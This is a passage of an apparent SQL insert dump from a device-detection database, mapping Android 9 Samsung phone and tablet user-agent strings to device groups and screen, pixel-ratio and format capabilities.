Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J600GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J610F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J610FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J610G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J701F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J701M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J701MT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J720F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J720M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J730F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J730FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J730G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J730GM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J737A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J737P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J737R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J737T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J737T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J737U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J737V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J737VPP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J810F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J810G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J810GF) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J810M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J810Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-M105F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-M105G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-M105M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-M107F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-M205F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-M205FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-M205G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-M205M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-M305F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-M305M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-M307F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-M307FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-M405F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N9005) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N935F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N9500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N950F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N950N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N950U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N950W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N9600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N960F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N960N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N960U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N960U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N960W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N9700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N970F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N970U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N9750) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N975F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N975U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N975U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N975W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N976B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-N976V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-S102DL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-S260DL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-S357BL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-S367VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-S506DL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-S757BL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-S767VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-T290) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-T295) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-T380) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-T385) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-T510) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-T515) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-T595) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-T720) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":711,\"screenHeight\":1138,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-T725) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-T820) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-T825) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-T830) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":711,\"screenHeight\":1138,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 